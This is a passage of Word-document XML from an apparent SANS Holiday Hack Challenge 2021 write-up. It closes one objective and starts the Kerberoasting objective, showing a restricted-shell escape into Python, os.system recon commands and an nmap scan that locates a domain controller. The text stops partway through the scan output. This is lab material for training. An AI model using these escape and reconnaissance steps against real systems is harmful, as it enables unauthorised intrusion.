    <w:p w14:paraId="4F42AD4C" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Biggering.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFF0BCF" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Size Chart from https://clothing.north.pole/shop/items/TheBigMansCoat.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1274DDD1" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>LowEarthOrbitFreqUsage.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286E57B2" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Best Winter Songs Ever List.doc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C27070E" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Win People and Influence Friends.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7046712F" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Q4 Game Floor Earnings.xlsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597114C1" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: [EXTERNAL] Re: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: [EXTERNAL] LOLLLL!!!.eml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6236138B" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Troll_Pay_Chart.xlsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9896C2" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="00B532EB"/>
    <w:p w14:paraId="5C280B89" w14:textId="53148122" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="00B532EB">
      <w:r>
        <w:t>The most recent xlsx file printed is at the bottom of the list, making “</w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Troll_Pay_Chart.xlsx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” the answer for this challenge. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2656BADC" w14:textId="77777777" w:rsidR="00413F94" w:rsidRDefault="00413F94"/>
    <w:p w14:paraId="0911660D" w14:textId="4E10836F" w:rsidR="00853B73" w:rsidRDefault="00853B73" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Objective 8 – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on an Open Fire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8F0EF7" w14:textId="3085A6BA" w:rsidR="00A81A30" w:rsidRDefault="00A81A30" w:rsidP="00A81A30">
      <w:r>
        <w:t xml:space="preserve">To solve this challenge, we’re asked </w:t>
      </w:r>
      <w:r w:rsidR="005558C2">
        <w:t xml:space="preserve">to obtain a secret research document that answers </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00A81A30">
        <w:t>What is the first secret ingredient Santa urges each elf and reindeer to consider for a wonderful holiday season?</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28076215" w14:textId="76168BF3" w:rsidR="00A81A30" w:rsidRDefault="00A81A30" w:rsidP="00A81A30">
      <w:r>
        <w:t>The first step for this challenge is to register an account at register.elfu.org.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A03EAFA" w14:textId="519EC898" w:rsidR="00A81A30" w:rsidRDefault="00A81A30" w:rsidP="00A81A30">
      <w:r>
        <w:t xml:space="preserve">This grants a username and password to be used over </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0094724D" w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on port 2222 at grades.elfu.org.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4407D5B5" w14:textId="735148D9" w:rsidR="00A81A30" w:rsidRDefault="00A81A30" w:rsidP="00A81A30">
      <w:r>
        <w:t xml:space="preserve">Upon logging into the grades.elfu.org host, a student is dropped into a custom script that displays their grades. There is only the option to view grades or exit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1064A2EC" w14:textId="22967858" w:rsidR="00A81A30" w:rsidRDefault="00A81A30" w:rsidP="00A81A30">
      <w:r>
        <w:t xml:space="preserve">After testing a few commands to escape the script, it appears that the script is only evaluating the first letter of the input and nothing else, so trying to break out of quotations or run second commands with semicolons was not effective. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01937E39" w14:textId="1A75B651" w:rsidR="00A81A30" w:rsidRDefault="00A81A30" w:rsidP="00A81A30">
      <w:r>
        <w:t xml:space="preserve">I tried initiating </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with the command flag set to run </w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> but that did not work either. After throwing a bunch of keypresses at it, I was able to successfully and reliably escape to a python shell after hitting escape, colon, then </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ctrl+d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170B675F" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Traceback (most recent call last):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8964D8" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  File "/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>grading_system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", line 41, in &lt;module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EE6C93" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C82B23" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  File "/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>grading_system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", line 26, in main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2BDD3E" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    a = input(": ").lower().strip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD37334" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EOFError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: EOF when reading a line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DFF175" w14:textId="06F79060" w:rsidR="00A81A30" w:rsidRPr="00A81A30" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5B21B4" w14:textId="6F40A2CA" w:rsidR="00853B73" w:rsidRDefault="00296B65">
      <w:r>
        <w:t>First, I ran “</w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” and confirmed that I could run commands that way. I knew that I needed to enumerate and pivot, so first I was interested in finding out where I was:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E93328" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; eval(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sho</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5C7FD0" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mtu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 65536 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qdisc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>noqueue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> state UNKNOWN group default </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qlen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A03930" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    link/loopback 00:00:00:00:00:00 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 00:00:00:00:00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBEAC31" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 127.0.0.1/8 scope host lo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E0D820" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>valid_lft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> forever </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>preferred_lft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> forever</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD01513" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">10: eth0@if11: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mtu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1500 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qdisc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>noqueue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> state UP group default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC53E63" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    link/ether 02:42:ac:11:00:02 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ff:ff:ff:ff:ff:ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> link-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netnsid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F7368E" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 172.17.0.2/16 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 172.17.255.255 scope global eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB22150" w14:textId="0C190487" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>valid_lft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> forever </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>preferred_lft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> forever</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CF5ABA" w14:textId="4BD86770" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="00296B65"/>
    <w:p w14:paraId="480513AC" w14:textId="13859AD5" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="00296B65">
      <w:r>
        <w:t>I was hoping to get useful information on my local subnet to start scanning, but this was a dead end. Eve Snowshoes specifically mentions that the domain controller we’re looking for is somewhere out in 10.0.0.0/8 and that routing tables might be interesting…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456B06C5" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; eval(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("route"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EF86D0" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Kernel IP routing table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4113ABD6" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Destination     Gateway         </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Genmask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">         Flags Metric Ref    Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Iface</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2AB3F527" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>default         172.17.0.1      0.0.0.0         UG    0      0        0 eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D0ACC9" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>10.128.1.0      172.17.0.1      255.255.255.0   UG    0      0        0 eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64819021" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>10.128.2.0      172.17.0.1      255.255.255.0   UG    0      0        0 eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59833E85" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>10.128.3.0      172.17.0.1      255.255.255.0   UG    0      0        0 eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D66DB4" w14:textId="46A1A131" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>172.17.0.0      0.0.0.0         255.255.0.0     U     0      0        0 eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3B749F" w14:textId="77777777" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="00296B65"/>
    <w:p w14:paraId="35F5D69F" w14:textId="04B6AFC9" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="00296B65">
      <w:r>
        <w:t xml:space="preserve">Since the goal was to find domain controllers, I ran the following </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command to get the DCs and anything else interesting that might be around in the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0791AB88" w14:textId="77A6C678" w:rsidR="00296B65" w:rsidRDefault="00296B65" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --open -p 22,139,445,88,389,636,3389 10.128.1.0/24 10.128.2.0/24 10.128.3.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5418CF6C" w14:textId="56DA3661" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="00296B65"/>
    <w:p w14:paraId="0C650068" w14:textId="0A9E6A0D" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="00296B65">
      <w:r>
        <w:t>The domain controller was found at 10.128.1.53:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3158C9B5" w14:textId="77777777" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for hhc21-windows-dc.c.holidayhack2021.internal (10.128.1.53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363EE964" w14:textId="77777777" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (0.00064s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268C637E" w14:textId="77777777" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Not shown: 1 filtered port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D19B28" w14:textId="77777777" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Some closed ports may be reported as filtered due to --defeat-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ratelimit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E3A4B2F" w14:textId="77777777" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>PORT     STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D633B71" w14:textId="77777777" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>88/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kerberos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EC3125" w14:textId="77777777" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>139/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netbios-ssn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A264323" w14:textId="77777777" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>389/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="58EA88BB" w14:textId="77777777" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>445/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388C40CE" w14:textId="77777777" w:rsidR="00632029" w:rsidRDefault="00632029" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>636/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
